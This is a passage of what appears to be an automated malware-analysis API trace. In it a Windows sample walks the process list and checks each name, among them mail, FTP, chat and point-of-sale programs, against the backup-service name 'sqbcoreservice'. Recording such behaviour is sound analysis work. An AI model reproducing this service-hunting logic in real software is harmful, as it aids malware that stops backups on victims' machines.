returned 1 [0096.243] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="icq.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0096.243] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x3574e60 [0096.243] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="icq.exe", cchWideChar=-1, lpMultiByteStr=0x3574e60, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="icq.exe", lpUsedDefaultChar=0x0) returned 8 [0096.243] lstrcpyA (in: lpString1=0x567fabc, lpString2="icq.exe" | out: lpString1="icq.exe") returned="icq.exe" [0096.243] StrStrIA (lpFirst="icq.exe", lpSrch="sqbcoreservice") returned 0x0 [0096.243] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0096.245] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="leechftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0096.245] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3576e38 [0096.245] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="leechftp.exe", cchWideChar=-1, lpMultiByteStr=0x3576e38, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="leechftp.exe", lpUsedDefaultChar=0x0) returned 13 [0096.245] lstrcpyA (in: lpString1=0x567fabc, lpString2="leechftp.exe" | out: lpString1="leechftp.exe") returned="leechftp.exe" [0096.245] StrStrIA (lpFirst="leechftp.exe", lpSrch="sqbcoreservice") returned 0x0 [0096.245] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0096.251] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ncftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0096.251] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3576d18 [0096.251] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ncftp.exe", cchWideChar=-1, lpMultiByteStr=0x3576d18, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ncftp.exe", lpUsedDefaultChar=0x0) returned 10 [0096.251] lstrcpyA (in: lpString1=0x567fabc, lpString2="ncftp.exe" | out: lpString1="ncftp.exe") returned="ncftp.exe" [0096.251] StrStrIA (lpFirst="ncftp.exe", lpSrch="sqbcoreservice") returned 0x0 [0096.251] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0096.252] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="notepad.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0096.252] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3576f88 [0096.252] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="notepad.exe", cchWideChar=-1, lpMultiByteStr=0x3576f88, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="notepad.exe", lpUsedDefaultChar=0x0) returned 12 [0096.252] lstrcpyA (in: lpString1=0x567fabc, lpString2="notepad.exe" | out: lpString1="notepad.exe") returned="notepad.exe" [0096.252] StrStrIA (lpFirst="notepad.exe", lpSrch="sqbcoreservice") returned 0x0 [0096.252] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xda4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0096.254] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="operamail.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0096.254] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x3576d30 [0096.254] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="operamail.exe", cchWideChar=-1, lpMultiByteStr=0x3576d30, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="operamail.exe", lpUsedDefaultChar=0x0) returned 14 [0096.254] lstrcpyA (in: lpString1=0x567fabc, lpString2="operamail.exe" | out: lpString1="operamail.exe") returned="operamail.exe" [0096.254] StrStrIA (lpFirst="operamail.exe", lpSrch="sqbcoreservice") returned 0x0 [0096.254] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0096.255] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="outlook.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0096.255] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3576e98 [0096.256] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="outlook.exe", cchWideChar=-1, lpMultiByteStr=0x3576e98, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="outlook.exe", lpUsedDefaultChar=0x0) returned 12 [0096.256] lstrcpyA (in: lpString1=0x567fabc, lpString2="outlook.exe" | out: lpString1="outlook.exe") returned="outlook.exe" [0096.256] StrStrIA (lpFirst="outlook.exe", lpSrch="sqbcoreservice") returned 0x0 [0096.256] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0096.257] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="pidgin.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0096.257] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3576e50 [0096.257] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="pidgin.exe", cchWideChar=-1, lpMultiByteStr=0x3576e50, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="pidgin.exe", lpUsedDefaultChar=0x0) returned 11 [0096.257] lstrcpyA (in: lpString1=0x567fabc, lpString2="pidgin.exe" | out: lpString1="pidgin.exe") returned="pidgin.exe" [0096.257] StrStrIA (lpFirst="pidgin.exe", lpSrch="sqbcoreservice") returned 0x0 [0096.257] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0096.258] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="scriptftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0096.258] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x3576f40 [0096.258] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="scriptftp.exe", cchWideChar=-1, lpMultiByteStr=0x3576f40, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="scriptftp.exe", lpUsedDefaultChar=0x0) returned 14 [0096.258] lstrcpyA (in: lpString1=0x567fabc, lpString2="scriptftp.exe" | out: lpString1="scriptftp.exe") returned="scriptftp.exe" [0096.258] StrStrIA (lpFirst="scriptftp.exe", lpSrch="sqbcoreservice") returned 0x0 [0096.258] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0096.260] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="skype.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0096.260] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3576f58 [0096.260] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="skype.exe", cchWideChar=-1, lpMultiByteStr=0x3576f58, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="skype.exe", lpUsedDefaultChar=0x0) returned 10 [0096.260] lstrcpyA (in: lpString1=0x567fabc, lpString2="skype.exe" | out: lpString1="skype.exe") returned="skype.exe" [0096.260] StrStrIA (lpFirst="skype.exe", lpSrch="sqbcoreservice") returned 0x0 [0096.260] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0096.261] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="smartftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0096.261] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3576d60 [0096.261] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="smartftp.exe", cchWideChar=-1, lpMultiByteStr=0x3576d60, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smartftp.exe", lpUsedDefaultChar=0x0) returned 13 [0096.261] lstrcpyA (in: lpString1=0x567fabc, lpString2="smartftp.exe" | out: lpString1="smartftp.exe") returned="smartftp.exe" [0096.261] StrStrIA (lpFirst="smartftp.exe", lpSrch="sqbcoreservice") returned 0x0 [0096.261] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0096.262] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="thunderbird.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0096.262] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x3576cb8 [0096.263] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="thunderbird.exe", cchWideChar=-1, lpMultiByteStr=0x3576cb8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="thunderbird.exe", lpUsedDefaultChar=0x0) returned 16 [0096.263] lstrcpyA (in: lpString1=0x567fabc, lpString2="thunderbird.exe" | out: lpString1="thunderbird.exe") returned="thunderbird.exe" [0096.263] StrStrIA (lpFirst="thunderbird.exe", lpSrch="sqbcoreservice") returned 0x0 [0096.263] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="totalcmd.exe")) returned 1 [0096.264] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="totalcmd.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0096.264] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3576ce8 [0096.264] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="totalcmd.exe", cchWideChar=-1, lpMultiByteStr=0x3576ce8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="totalcmd.exe", lpUsedDefaultChar=0x0) returned 13 [0096.264] lstrcpyA (in: lpString1=0x567fabc, lpString2="totalcmd.exe" | out: lpString1="totalcmd.exe") returned="totalcmd.exe" [0096.264] StrStrIA (lpFirst="totalcmd.exe", lpSrch="sqbcoreservice") returned 0x0 [0096.264] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0096.265] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="trillian.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0096.265] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3576e68 [0096.265] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="trillian.exe", cchWideChar=-1, lpMultiByteStr=0x3576e68, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="trillian.exe", lpUsedDefaultChar=0x0) returned 13 [0096.265] lstrcpyA (in: lpString1=0x567fabc, lpString2="trillian.exe" | out: lpString1="trillian.exe") returned="trillian.exe" [0096.265] StrStrIA (lpFirst="trillian.exe", lpSrch="sqbcoreservice") returned 0x0 [0096.265] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0096.267] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="webdrive.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0096.267] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3576da8 [0096.267] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="webdrive.exe", cchWideChar=-1, lpMultiByteStr=0x3576da8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="webdrive.exe", lpUsedDefaultChar=0x0) returned 13 [0096.267] lstrcpyA (in: lpString1=0x567fabc, lpString2="webdrive.exe" | out: lpString1="webdrive.exe") returned="webdrive.exe" [0096.267] StrStrIA (lpFirst="webdrive.exe", lpSrch="sqbcoreservice") returned 0x0 [0096.267] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xeec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0096.269] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="whatsapp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0096.269] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3576dc0 [0096.269] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="whatsapp.exe", cchWideChar=-1, lpMultiByteStr=0x3576dc0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="whatsapp.exe", lpUsedDefaultChar=0x0) returned 13 [0096.270] lstrcpyA (in: lpString1=0x567fabc, lpString2="whatsapp.exe" | out: lpString1="whatsapp.exe") returned="whatsapp.exe" [0096.270] StrStrIA (lpFirst="whatsapp.exe", lpSrch="sqbcoreservice") returned 0x0 [0096.270] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0096.271] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="winscp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0096.271] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3576dd8 [0096.271] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="winscp.exe", cchWideChar=-1, lpMultiByteStr=0x3576dd8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winscp.exe", lpUsedDefaultChar=0x0) returned 11 [0096.271] lstrcpyA (in: lpString1=0x567fabc, lpString2="winscp.exe" | out: lpString1="winscp.exe") returned="winscp.exe" [0096.271] StrStrIA (lpFirst="winscp.exe", lpSrch="sqbcoreservice") returned 0x0 [0096.271] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0096.272] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="yahoomessenger.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0096.272] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x3575c80 [0096.272] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="yahoomessenger.exe", cchWideChar=-1, lpMultiByteStr=0x3575c80, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="yahoomessenger.exe", lpUsedDefaultChar=0x0) returned 19 [0096.272] lstrcpyA (in: lpString1=0x567fabc, lpString2="yahoomessenger.exe" | out: lpString1="yahoomessenger.exe") returned="yahoomessenger.exe" [0096.272] StrStrIA (lpFirst="yahoomessenger.exe", lpSrch="sqbcoreservice") returned 0x0 [0096.272] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xffc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0096.273] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="active-charge.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0096.273] LocalAlloc (uFlags=0x40, uBytes=0x12) returned 0x3575d20 [0096.273] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="active-charge.exe", cchWideChar=-1, lpMultiByteStr=0x3575d20, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="active-charge.exe", lpUsedDefaultChar=0x0) returned 18 [0096.273] lstrcpyA (in: lpString1=0x567fabc, lpString2="active-charge.exe" | out: lpString1="active-charge.exe") returned="active-charge.exe" [0096.273] StrStrIA (lpFirst="active-charge.exe", lpSrch="sqbcoreservice") returned 0x0 [0096.273] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xce8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0096.274] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="accupos.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0096.274] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3576e80 [0096.274] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="accupos.exe", cchWideChar=-1, lpMultiByteStr=0x3576e80, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="accupos.exe", lpUsedDefaultChar=0x0) returned 12 [0096.274] lstrcpyA (in: lpString1=0x567fabc, lpString2="accupos.exe" | out: lpString1="accupos.exe") returned="accupos.exe" [0096.274] StrStrIA (lpFirst="accupos.exe", lpSrch="sqbcoreservice") returned 0x0 [0096.274] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd08, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0096.275] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="afr38.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0096.275] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3576eb0 [0096.275] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="afr38.exe", cchWideChar=-1, lpMultiByteStr=0x3576eb0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="afr38.exe", lpUsedDefaultChar=0x0) returned 10 [0096.275] lstrcpyA (in: lpString1=0x567fabc, lpString2="afr38.exe" | out: lpString1="afr38.exe") returned="afr38.exe" [0096.275] StrStrIA (lpFirst="afr38.exe", lpSrch="sqbcoreservice") returned 0x0 [0096.275] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0096.276] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="aldelo.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0096.276] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3576ec8 [0096.276] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="aldelo.exe", cchWideChar=-1, lpMultiByteStr=0x3576ec8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="aldelo.exe", lpUsedDefaultChar=0x0) returned 11 [0096.277] lstrcpyA (in: lpString1=0x567fabc, lpString2="aldelo.exe" | out: lpString1="aldelo.exe") returned="aldelo.exe" [0096.277] StrStrIA (lpFirst="aldelo.exe", lpSrch="sqbcoreservice") returned 0x0 [0096.277] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xabc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0096.278] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ccv_server.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0096.278] LocalAlloc (uFlags=0x40, uBytes=0xf) returned 0x3576ee0 [0096.278] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ccv_server.exe", cchWideChar=-1, lpMultiByteStr=0x3576ee0, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ccv_server.exe", lpUsedDefaultChar=0x0) returned 15 [0096.278] lstrcpyA (in: lpString1=0x567fabc, lpString2="ccv_server.exe" | out: lpString1="ccv_server.exe") returned="ccv_server.exe" [0096.278] StrStrIA (lpFirst="ccv_server.exe", lpSrch="sqbcoreservice") returned 0x0 [0096.278] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0096.279] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="centralcreditcard.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0096.279] LocalAlloc (uFlags=0x40, uBytes=0x16) returned 0x3575e40 [0096.279] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="centralcreditcard.exe", cchWideChar=-1, lpMultiByteStr=0x3575e40, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="centralcreditcard.exe", lpUsedDefaultChar=0x0) returned 22 [0096.279] lstrcpyA (in: lpString1=0x567fabc, lpString2="centralcreditcard.exe" | out: lpString1="centralcreditcard.exe") returned="centralcreditcard.exe" [0096.279] StrStrIA (lpFirst="centralcreditcard.exe", lpSrch="sqbcoreservice") returned 0x0 [0096.279] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x804, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, 